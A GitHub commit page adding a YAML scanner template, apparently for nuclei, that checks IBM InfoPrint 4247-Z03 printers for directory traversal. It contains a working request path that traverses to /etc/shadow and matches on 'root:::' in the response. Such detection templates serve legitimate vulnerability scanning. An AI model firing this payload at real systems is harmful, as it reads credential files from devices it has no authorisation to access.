Skip to content

Commit

Permalink
Merge pull request #218 from harsh-bothra/patch-9
Browse files Browse the repository at this point in the history
Create ibm-infoprint-directory-traversal
  • Loading branch information
ehsandeep committed Jul 8, 2020
2 parents f2bfdbf + 3d7f039 commit 507dfb7
Showing 1 changed file with 22 additions and 0 deletions.
22 changes: 22 additions & 0 deletions vulnerabilities/ibm-infoprint-directory-traversal.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@
id: IBM InfoPrint Directory Traversal

info:
name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal
author: Harsh Bothra
severity: Medium

# source:- https://www.exploit-db.com/exploits/47835

requests:
- method: GET
path:
- '{{BaseURL}}/./../../../../../../../../../../etc/shadow'

matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "root:::"

0 comments on commit 507dfb7

Please sign in to comment.